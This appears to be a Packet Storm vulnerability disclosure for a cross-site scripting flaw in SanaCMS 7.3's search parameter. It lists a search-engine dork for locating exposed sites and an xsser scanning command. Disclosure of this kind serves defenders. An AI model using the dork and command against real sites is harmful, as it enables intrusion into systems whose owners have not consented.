Sandata SanaCMS 7.3 Cross Site Scripting

2017-02-05T00:00:00
ID PACKETSTORM:140926
Type packetstorm
Reporter Hosein Askari
Modified 2017-02-05T00:00:00

Description

                                        
                                            `#####  
#Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting  
#Exploit Author: Hosein Askari  
#Vendor HomePage: https://www.sanadata.com/|  
#Version : 7.3  
#Dork : intext:"SANADATA | SanaCMS 7.3"  
#Tested on:Parrot OS  
#Date: 3-2-2017  
#Category: webapps  
#Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search=  
#Command For Testing:  
#xsser -u "http://127.0.0.1/en/index.asp?p=search&search="  
# Author Mail :hosein.askari@aol.com  
#####  
  
`